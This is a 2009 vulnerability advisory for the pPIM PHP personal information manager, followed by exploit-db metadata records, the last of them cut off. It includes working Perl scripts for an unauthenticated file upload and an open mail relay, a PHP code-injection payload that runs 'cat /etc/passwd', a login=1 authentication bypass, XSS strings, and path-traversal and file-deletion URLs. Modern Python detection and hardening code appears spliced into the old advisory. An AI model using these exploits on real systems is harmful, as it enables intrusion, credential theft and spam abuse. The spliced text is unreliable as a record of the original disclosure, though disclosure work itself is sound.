-= pPIM Multiple Vulnerabilities =-
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane <justin@madirish.net>
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
publication on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093). As a
milw0rm exploit is already posted, it is likely malicious users are already
exploiting pPIM. I decided to have a closer look at pPIM and, quite
frankly, was horrified by what I found. pPIM contains multiple
vulnerabilities, from version information leakage, to system credential
disclosure, to remote command execution, authentication bypass and cross
site scripting vulnerabilities. Possibly the only class of
vulnerability pPIM is not exposed to is SQL injection, as it doesn't
employ any database back end. That said, there seemed to be nothing in
the way of security present in pPIM other than an easily bypassable GET
variable check in the header. The following is a brief synopsis of my
findings, although I gave up investigating after discovering so many
flaws in the application's architecture with respect to security.
Version Information Leakage:
By calling the URL http://target.tld/ppim/Readme.txt you can view the
version information of the installed version of pPIM.
Password Hash Disclosure:
By requesting the URL http://target.tld/ppim/password.dat the password
hash is revealed. Depending on the hashing algorithm used, this hash
could be trivial to crack with a password cracking tool like John the
Ripper.
Unauthenticated Password Change:
There is no authentication protection on the password changing script,
so calling
http://target.tld/ppim/changepassword.php
will present an attacker with the password change form and allow the
password to be reset without confirming the existing one.
Multiple Authentication Problems:
Because the authentication check lives in a piece of PHP code embedded in
templates/header.html, depending on server configuration this code might
not be executed at all. Unless the web server is specifically configured
to execute PHP embedded in .html files server side, the PHP code will
instead simply be passed back to clients as literal HTML.
Authentication bypass is possible by simply appending the GET variable
'login=1' to the URL. For example, to access the Calendar page, calling
the URL 'http://target.tld/ppim/calendar.php' will redirect the
unauthenticated user to the login page. However, calling the URL
'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated
access to the Calendar. Any of the pages in pPIM can be accessed this way.
Arbitrary File Upload
pPIM's upload.php script allows attackers to upload arbitrary scripts of
any type to the target server. To demonstrate this, first create the file
to be uploaded:
$ echo "<?php echo phpinfo();?>" > phpinfo.php
Then execute the following Perl script:
#!/usr/bin/perl
#
# pPIM Uploader by Justin C. Klein Keane <justin@lampsecurity.org>
# Used to upload the file phpinfo.php to a target pPIM site
# bypassing authentication.
#
# Feb 24, 2009
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

my $ua = LWP::UserAgent->new();

# Multipart form fields matching pPIM's own upload form; the file is the
# phpinfo.php created above.
my $response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',
    Content_Type => 'form-data',
    Content      =>
    [
        'submitupload' => 'submitupload',
        'userfile'     => ['./phpinfo.php']
    ],
);
die "Error: ", $response->status_line unless $response->is_success;
Unauthorized Email Relay
pPIM's sendmail.php script has absolutely no authentication or
validation, allowing anyone with access to the site to relay e-mail.
The following Perl script will relay email through the pPIM installation:
#!/usr/bin/perl
#
# pPIM Mailer by Justin C. Klein Keane <justin@lampsecurity.org>
# Used to relay mail through any pPIM installation
#
# Feb 24, 2009
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

my $ua = LWP::UserAgent->new();

# Multipart form fields matching pPIM's own compose form.
my $response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',
    Content_Type => 'form-data',
    Content      =>
    [
        'submitemail' => 'submitemail',
        'to'          => 'root@localhost',
        'from'        => 'root@localhost',
        'message'     => 'You are just asking for spam!'
    ],
);
die "Error: ", $response->status_line unless $response->is_success;
Posting Unauthenticated Notes
The notes.php script fails to check authentication before inserting new
notes. This allows attackers to post notes without even having to
bypass authentication. Similarly no authentication is required to
delete notes, allowing unauthenticated attackers to clear all stored notes.
XSS Vulnerability
None of the form fields seem to be adequately scrubbed to prevent Cross
Site Scripting (XSS). This vulnerability is endemic throughout the
application. For instance, creating a note with the title
"<script>alert('foo');</script>" causes a JavaScript alert box displaying
the word "foo" to pop up whenever the Notes screen is accessed.
System Credential Exposure
Because the Email function stores mailbox information in a flat file that
is directly web accessible, system account information is easily
disclosed. For instance, if I were to create a new mailbox for root in
pPIM, a file called "root.email" would be created in the email folder.
By calling the URL http://target.tld/ppim/email/root.email the following
output is exposed via the web browser:
<?php
$mailserver = "localhost";
$username = "root";
$password = "root_password";
?>
Thus an attacker who can enumerate (or guess) the user accounts for
mailboxes set up via pPIM can easily disclose the mail server location as
well as usernames and passwords. The same problem affects all data stored
in pPIM: every data file can be requested directly by URL without any
form of authentication, so everything stored in pPIM is exposed to
unauthenticated users.
Arbitrary Command Execution
By creating a specially crafted link an attacker can run arbitrary
commands with the privileges of the web server process, because altering
the URL field of a link manipulates the data file pPIM writes to disk.
Under normal usage a user can create a new link under a group, say
'test_group', with the name 'testlink', the URL '192.168.0.1' and the
description 'test description'. This link is then stored in pPIM's root
directory under the links/test_group/ directory as testlink.link.
Viewing this file we see:
$ cat testlink.link
<?php
$url="192.168.0.52";
$name="test link";
$description="This is the test link";
?>
This file is pulled in with a PHP include when the link is rendered.
Rudimentary JavaScript provides client side validation of input data
only, so if an attacker submits the form directly with the following data:
linkname=evil_link&linkurl=";$url=system('cat
/etc/passwd');$foo="&linkdescription=test2&groupname=test+group&linksubmit=Make+Link
The $url variable is overwritten with the injected definition. Looking at
the evil_link.link file created on the filesystem we see:
$ cat evil_link.link
<?php
$url="";$url=system('cat /etc/passwd');$foo="";
$name="evil_link";
$description="test2";
?>
Thus we have arbitrarily overwritten the $url variable and assigned it
the return value of our system() call. From then on, whenever a user
views the Links page, the contents of /etc/passwd are rendered in their
web browser.
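To make the mechanism above concrete from the defender's side, here is an added example (not code from the advisory or from pPIM) that reproduces the way pPIM pastes the URL field into a PHP file, shows that the advisory's crafted linkurl value yields exactly the evil_link.link file listed above, and then gives two mitigations: an offline check for .link files that have already been tampered with, and a hardened writer that stores the link as JSON data plus a server-side URL validator. The function names, the JSON file format and the http(s)-only URL policy are this example's own assumptions, not pPIM's.

```python
import json
import re
from urllib.parse import urlsplit


def write_link_file_as_ppim_does(name, url, description):
    """Reproduces the vulnerable pattern from the advisory: user input is
    pasted into PHP source that will later be require()d. A double quote in
    the url ends the string literal and everything after it becomes code."""
    return ('<?php\n'
            f'$url="{url}";\n'
            f'$name="{name}";\n'
            f'$description="{description}";\n'
            '?>\n')


# The linkurl value from the advisory's crafted form submission, and the
# evil_link.link file it produces (both copied from the advisory text).
INJECTED_URL = '";$url=system(\'cat /etc/passwd\');$foo="'
EVIL_FILE = ('<?php\n'
             '$url="";$url=system(\'cat /etc/passwd\');$foo="";\n'
             '$name="evil_link";\n'
             '$description="test2";\n'
             '?>\n')

# One plain assignment of a double-quoted literal containing no quote,
# backslash or dollar sign: the only line shape a legitimate .link file has.
LINK_LINE_RE = re.compile(r'\$(?:url|name|description)="[^"\\$]*";')


def link_file_is_tampered(text):
    """Offline check for .link files already on disk. Any body line that is
    not a single benign assignment means a value broke out of its literal."""
    lines = text.splitlines()
    if lines[:1] != ["<?php"] or lines[-1:] != ["?>"]:
        return True
    body = lines[1:-1]
    return len(body) != 3 or any(
        LINK_LINE_RE.fullmatch(line) is None for line in body)


# RFC 3986 URL characters; notably excludes '"', '$', whitespace and '\'.
URL_CHARS_RE = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!&'()*+,;=%-]+")


def validate_link_url(url):
    """Server-side replacement for pPIM's client-side JavaScript check.
    Assumed policy, stricter than pPIM's: an http(s) scheme and a host are
    required, and only URL characters are allowed."""
    parts = urlsplit(url)
    return (parts.scheme in ("http", "https")
            and bool(parts.netloc)
            and URL_CHARS_RE.fullmatch(url) is not None)


def serialize_link(name, url, description):
    """Hardened storage (assumed format): the link is written as JSON data,
    never as PHP code, so the rendering page parses the file instead of
    executing it, whatever characters the value contains."""
    return json.dumps({"url": url, "name": name,
                       "description": description}) + "\n"


def load_link(text):
    return json.loads(text)


if __name__ == "__main__":
    vulnerable = write_link_file_as_ppim_does("evil_link", INJECTED_URL, "test2")
    print(vulnerable)
    print("tampered:", link_file_is_tampered(vulnerable))
    print("url accepted:", validate_link_url(INJECTED_URL))
    print(serialize_link("evil_link", INJECTED_URL, "test2"))
```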
Conclusions:
I stopped poking at pPIM after gleaning these details as it became
abundantly clear that the application is thoroughly riddled with holes.
pPIM fails to enforce any security in its code, and deploying the
application produces a gaping hole in the security of any host.
Recommendations:
Uninstall pPIM immediately!
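For anyone who needs to establish whether an installation was already hit before it is removed, the following is an added example (not part of the advisory) that runs over Apache combined-format access log lines and flags the request patterns described above: reads of Readme.txt, password.dat and email/*.email, access to changepassword.php, POSTs to sendmail.php and to upload.php, and any successful pPIM request carrying the login=1 bypass parameter. The log lines are constructed for the example and the /ppim/ install path, label names and 2xx-only rule are its own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format sample lines (not real traffic); the
# paths are the ones named in the advisory.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Feb/2009:10:01:02 +0000] "GET /ppim/index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Feb/2009:10:01:09 +0000] "GET /ppim/Readme.txt HTTP/1.1" 200 844 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Feb/2009:10:01:15 +0000] "GET /ppim/password.dat HTTP/1.1" 200 33 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Feb/2009:10:01:31 +0000] "GET /ppim/calendar.php?login=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Feb/2009:10:01:50 +0000] "GET /ppim/changepassword.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Feb/2009:10:02:03 +0000] "POST /ppim/upload.php?login=1 HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.10 - - [25/Feb/2009:10:02:10 +0000] "GET /ppim/phpinfo.php HTTP/1.1" 200 50211 "-" "libwww-perl/5.805"
198.51.100.7 - - [25/Feb/2009:10:05:44 +0000] "GET /ppim/email/root.email HTTP/1.1" 200 96 "-" "curl/7.18.0"
198.51.100.7 - - [25/Feb/2009:10:06:01 +0000] "POST /ppim/sendmail.php HTTP/1.1" 200 310 "-" "libwww-perl/5.805"
192.0.2.5 - - [25/Feb/2009:10:07:00 +0000] "GET /ppim/login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.5 - - [25/Feb/2009:10:07:30 +0000] "GET /ppim/notes.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def classify(method, target, status):
    """Return a finding label for one request, or None if it is unremarkable.
    Only successful (2xx) requests under /ppim/ are flagged: a 302 back to
    the login page means the header check actually fired."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if not path.startswith("/ppim/") or not status.startswith("2"):
        return None
    base = path.rsplit("/", 1)[-1]
    bypass = parse_qs(parts.query).get("login") == ["1"]
    if base == "password.dat":
        return "password-hash-disclosure"
    if base == "readme.txt":
        return "version-disclosure"
    if path.startswith("/ppim/email/") and path.endswith(".email"):
        return "mail-credential-disclosure"
    if base == "changepassword.php":
        return "unauthenticated-password-change"
    if base == "sendmail.php" and method == "POST":
        return "mail-relay"
    if base == "upload.php" and method == "POST" and bypass:
        return "unauthenticated-upload"
    if bypass:
        return "auth-bypass-login-param"
    return None


def scan(log_text):
    """Parse each log line and collect (ip, label, target) findings."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["target"], m["status"])
        if label:
            findings.append((m["ip"], label, m["target"]))
    return findings


def summarize(findings):
    """Distinct labels per source address. The advisory's issues chain
    together, so several different labels from one address is the
    strongest signal of active exploitation rather than stray scanning."""
    per_ip = {}
    for ip, label, _ in findings:
        per_ip.setdefault(ip, set()).add(label)
    return {ip: sorted(labels) for ip, labels in per_ip.items()}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, label, target in results:
        print(f"{ip:15} {label:32} {target}")
    print(summarize(results))
```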
# milw0rm.com [2009-02-25]
{"id": "EDB-ID:8105", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ppim 1.0 - Multiple Vulnerabilities", "description": "pPIM 1.0 Multiple Remote Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit for php platform", "published": "2009-02-25T00:00:00", "modified": "2009-02-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8105/", "reporter": "Justin Keane", "references": [], "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "lastseen": "2016-02-01T04:45:11", "viewCount": 10, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-02-01T04:45:11", "rev": 2}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6215", "EDB-ID:6667", "EDB-ID:6231"]}, {"type": "cve", "idList": ["CVE-2008-4427", "CVE-2008-4528", "CVE-2008-4428", "CVE-2008-4425", "CVE-2008-4426"]}, {"type": "openvas", "idList": ["OPENVAS:100005", "OPENVAS:1361412562310100005"]}], "modified": "2016-02-01T04:45:11", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/8105/", "sourceData": "- -= pPIM Multiple Vulnerabilities =-\n\nVersion Tested: pPIM 1.0\nVendor notified\nFull details can also be found at http://www.lampsecurity.org/node/18\nAuthor: Justin C. Klein Keane <justin@madirish.net>\n\nDescription\n\npPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal\nInformation Management application written in PHP that can store\ncontacts (including their photos), events, links, notes, send and check\nemail, and upload files. pPIM came to my attention recently with the\npublishing on Milw0rm of exploit code designed to facilitate remote\ncommand execution (http://www.milw0rm.com/exploits/8093). As there is a\nmilw0rm exploit already posted it is likely malicious users are already\nexploiting pPIM. 
I decided to have a closer look at pPIM and, quite\nfrankly, was horrified by what I found. pPIM contains multiple\nvulnerabilities, from version information leakage, to system credential\ndisclosure, to remote command execution, authentication bypass and cross\nsite scripting vulnerabilities. Possibly the only class of\nvulnerability pPIM is not exposed to is SQL injection as it doesn't\nemploy any database back end. That said, there seemed to be nothing in\nthe way of security other than an easily bypassable GET variable check\nin the header, present in pPIM. The following is a brief synopsis of my\nfindings, although I gave up investigation at after discovering so many\nflaws in the application's architecture with respect to security.\n\nVersion Information Leakage:\n\nBy calling the URL http://target.tld/ppim/Readme.txt you can view the\nversion information of the installed version of pPIM.\n\nPassword Hash Disclosure:\n\nBy requesting the URL http://target.tld/ppim/password.dat the password\nhash is revealed. Depending on the hashing algorithm used by PHP this\ncould be trivially easy to compromise using a password cracking tool\nlike John the Ripper.\n\nUnauthenticated Password Change:\n\nThere is no authentication protection on the password changing script,\nso calling\n\nhttp://target.tld/ppim/changepassword.php\n\nwill present an attacker with the password change script and allow\npassword reset without confirming the existing password.\n\nMultiple Authentication Problems:\n\nBecause the authentication takes place in templates/header.html in an\nembedded piece of PHP code, depending on server configuration, this code\nmight not be executed. Unless the web server is specifically configured\nto execute PHP embeded in HTML files server site the PHP code will\ninstead simply be passed back to clients as actual HTML.\n\nAuthentication bypass is possible by simply appending the GET variable\n'login=1' to the URL. 
For example, to access the Calendar page, calling\nthe URL 'http://target.tld/ppim/calendar.php' will redirect the\nunauthenticated user to the login page. However, calling the URL\n'http://target.tld/ppim/calendar.php?login=1' will allow unauthenticated\naccess to the Calendar. Any of the pages in pPIM can be accessed this way.\n\nArbitrary File Upload\n\npPIM's upload.php script allows attackers to upload arbitrary scripts of\nany type to the target server. To do this using Perl simply create the\nfile and upload it using Perl:\n\n$ echo \"<?php echo phpinfo();?>\" > phpinfo.php\n\nThe execute the following Perl script:\n\n#!/usr/bin/perl\n#\n# pPIM Uploader by Justin C. Klein Keane <justin@lampsecurity.org>\n# Used to upload the file phpinfo.php to a target pPIM site\n# bypassing authentication.\n#\n# Feb 24, 2009\n#\nuse LWP::UserAgent;\nuse HTTP::Request::Common qw(POST);\n\n$ua = LWP::UserAgent->new();\n$request = HTTP::Request->new();\n\n$response = $ua->request( POST 'http://target.tld/ppim/upload.php?login=1',\n Content_Type => 'form-data',\n Content =>\n [\n 'submitupload' => 'submitupload',\n 'userfile' => ['./info.php']\n ],\n);\ndie \"Error: \", $response->status_line unless $response->is_success;\n\nUnauthorized Email Relay\n\npPIM's sendmail.php script has absolutely no authentication or\nvalidation, allowing anyone with access to the site to relay e-mail.\nThe following Perl script will relay email through the pPIM installation:\n\n#!/usr/bin/perl\n#\n# pPIM Mailer by Justin C. 
Klein Keane <justin@lampsecurity.org>\n# Used to relay mail through any pPIM installation\n#\n# Feb 24, 2009\n#\nuse LWP::UserAgent;\nuse HTTP::Request::Common qw(POST);\n\n$ua = LWP::UserAgent->new();\n$request = HTTP::Request->new();\n\n$response = $ua->request( POST 'http://target.tld/ppim/sendmail.php',\n Content_Type => 'form-data',\n Content =>\n [\n 'submitemail' => 'submitemail',\n 'to' => 'root@localhost',\n 'from' => 'root@localhost',\n 'message' => 'You are just asking for spam!'\n ],\n);\ndie \"Error: \", $response->status_line unless $response->is_success;\n\nPosting Unauthenticated Notes\n\nThe notes.php script fails to check authentication before inserting new\nnotes. This allows attackers to post notes without even having to\nbypass authentication. Similarly no authentication is required to\ndelete notes, allowing unauthenticated attackers to clear all stored notes.\n\nXSS Vulnerability\n\nNone of the form fields seem to be adequately scrubbed to prevent Cross\nSite Scripting (XSS). This vulnerability is endemic throughout the\napplication. For instance, creating a note with the title\n\"<script>alert('foo');</script>\" causes a JavaScript alert box to pop up\nthe word \"foo\" whenever the Notes screen is accessed.\n\nSystem Credential Exposure\n\nBecause the Email function stores mailbox information as a flat file it\nis easy to disclose system account information. For instance, in pPIM,\nif I were to create a new mailbox for root a file called \"root.email\"\nwould be created in the email folder. By calling the URL\nhttp://target.tld/ppim/email/root.email the following output is exposed\nvia web browser:\n\n<?php\n$mailserver = \"localhost\";\n$username = \"root\";\n$password = \"root_password\";\n?>\n\nThus an attacker that can enumerate (or guess) user accounts for\nmailboxes set up via pPIM can easily disclose server location as well as\nusernames and passwords. 
This vulnerability affects all data stored in\npPIM - it can be accessed directly via URL call without any form of\nauthentication and will expose any material stored in pPIM to users\nwithout authentication.\n\nArbitrary Command Execution\n\nBy creating a specially crafted link an attacker can run arbitrary\ncommands with the privileges of the web server process. By altering the\nURL field of a link the data files created can be manipulated. Under\nnormal usage a user can create a new link under a group, say the\n'test_group' with the name 'testlink', the URL '192.168.0.1' and the\ndescription 'test description'. This file is then stored in pPIM's root\ndirectory under the links/test_group/ directory as testlink.link.\nViewing this file we see:\n\n$ cat testlink.link\n<?php\n$url=\"192.168.0.52\";\n$name=\"test link\";\n$description=\"This is the test link\";\n?>\n\nThis file is included as a PHP include when the note is rendered.\nRudimentary JavaScript provides client side validation of input data,\nbut if an attacker arbitrarily submitted a form with the following data:\n\nlinkname=evil_link&linkurl=\";$url=system('cat\n/etc/passwd');$foo=\"&linkdescription=test2&groupname=test+group&linksubmit=Make+Link\n\nThe URL variable is overwritten with injected definition. Looking at\nthe evil_link.link file created on the filesystem we see:\n\n$ cat evil_link.link\n<?php\n$url=\"\";$url=system('cat /etc/passwd');$foo=\"\";\n$name=\"evil_link\";\n$description=\"test2\";\n?>\n\nThus we have arbitrarily overwritten the $url variable and assigned it\nthe value that returns from the output of our system call. 
In fact, now\nwhen a user viewed the Links page they could read the /etc/passwd file\nvia a web browser.\n\nConclusions:\n\nI stopped poking at pPIM after gleaning these details as it became\nabundantly clear that the application is thoroughly riddled with holes.\n pPIM fails to enforce any security in it's code, and deploying the\napplication produces a gaping hole in the security of any host.\n\nRecommendations:\n\nUninstall pPIM immediately!\n\n# milw0rm.com [2009-02-25]\n", "osvdbidlist": ["56374", "56376", "56375", "56373", "56372", "56371"]}
{"exploitdb": [{"lastseen": "2016-02-01T00:27:01", "description": "Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit f...", "published": "2008-08-10T00:00:00", "type": "exploitdb", "title": "Ppim <= 1.0 Arbitrary File Delete/XSS Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "modified": "2008-08-10T00:00:00", "id": "EDB-ID:6215", "href": "https://www.exploit-db.com/exploits/6215/", "sourceData": "##########################################################\n#Author : BeyazKurt\n#Contact : Djm-sut@Hotmail.Com\n#\n#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]\n#Download : http://scripts.ringsworld.com/organizers/ppim.zip\n#\n# D0rk : inurl:events.php?listallevents\n#\n# File Delete Vulnerability: upload.php\n#\n# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx\n# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName\n#\n# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n#\n# XSS Vulnerability: events.php\n#\n#[CODE]\n# <?php\n# if (isset($_GET['date']))\n# {\n# $date_id = $_GET['date'];\n# print \"<a href=\\\"events.php?mode=new&date=$date_id\\\">New Event</a><br / >\";\n# }\n# ?>\n#[/CODE]\n#\n#Exploit :\n# events.php?mode=new&date=XSS CODE\n# events.php?mode=new&date=\"><script>alert('XSS')</script>\n# -------------------------------\n#\n# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)\n# pigs for dedication : : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!\n# Proud 2 Be ALBANIAN\n#\n# MTK : 0 - 5 : FenerBah\u0e23\u0083\u0e22\u0e07e (H)\n#\n# Not : Fuck off pala! aq lameri.\n# Thnx : All Muslims Albanian & Turkish Coder.. 
And CrazyShark f0r translate.\n#######################################################\n\n# milw0rm.com [2008-08-10]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6215/"}, {"lastseen": "2016-02-01T00:28:54", "description": "Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities. CVE-2008-4425,CVE-2008-4426,CVE-2008-4427,CVE-2008-4428,CVE-2008-4528. Webapps exploit for ...", "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Ppim <= 1.0 upload/change password Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4425", "CVE-2008-4428", "CVE-2008-4528", "CVE-2008-4427", "CVE-2008-4426"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:6231", "href": "https://www.exploit-db.com/exploits/6231/", "sourceData": "Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities\ncript : Ppim v1.0\nDownload : http://scripts.ringsworld.com/organizers/ppim.zip\nBy Stack\nPoc 1: change password\nfor change password go to this link\nhttp://localhost/ppim/changepassword.php\nwrithe your password and confirm it\n\nPoc 2 : upload\nhttp://localhost/ppim/upload.php\nyou can upload you php shell in this link\nafter you go here\nhttp://localhost/ppim/shell.php\n\n# milw0rm.com [2008-08-11]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6231/"}, {"lastseen": "2016-02-01T01:21:58", "description": "pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability. CVE-2008-4528. 
Webapps exploit for php platform", "published": "2008-10-04T00:00:00", "type": "exploitdb", "title": "pPIM 1.01 notes.php id Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4528"], "modified": "2008-10-04T00:00:00", "id": "EDB-ID:6667", "href": "https://www.exploit-db.com/exploits/6667/", "sourceData": "# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability\n# url: http://www.phlatline.org/docs/files/ppim.zip\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n\n\ndescription of vulnerability:\n-----------------------------------------------\nthe variable 'id' has been not defined in code \nand the variable 'id' is sent by the users.\n-----------------------------------------------\n\nvuln file: notes.php\n\nvuln code:\nx: >...\n107: if (isset($_GET[\"mode\"]))\n\n\t {\n\n\t \tif ($_GET[\"mode\"]==\"edit\")\n\n\t\t{\n\n\t\t if (isset($_GET['id']))\n\n\t\t {\n\n\t\t \t$notefile = $_GET['id'];\n\n\t\t\tif ($notefile == \"new\")\n\n\t\t\t{\n\n\t\t\t $title = \"\";\n\n\t\t\t $notes = \"\";\n\n\t\t\t}\n\n\t\t\telse\n\n\t\t\t{\n\n\t\t\t $temp = \"notes/\" . 
$notefile;\n\n\t\t\t require($temp);\n\n123:\t\t\t}\nx: <...\nx: }}}\n\nexploit: GET /notes.php?mode=edit&id=[file]\nsample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd\n\nlive demo:\nhttp://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php\n\n# milw0rm.com [2008-10-04]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6667/"}], "cve": [{"lastseen": "2021-02-02T05:35:17", "description": "Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action.", "edition": 4, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4426", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4426"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4426", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "changepassword.php in Phlatline's Personal Information Manager (pPIM) 1.0 and earlier does not require administrative authentication, which allows remote attackers to change 
arbitrary passwords.", "edition": 6, "cvss3": {}, "published": "2008-10-03T22:22:00", "title": "CVE-2008-4427", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4427"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phlatline:personal_information_manager:1.0"], "id": "CVE-2008-4427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4427", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phlatline:personal_information_manager:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:17", "description": "Directory traversal vulnerability in notes.php in Phlatline's Personal Information Manager (pPIM) 1.01 allows remote attackers to include and execute arbitrary local files via a .. 
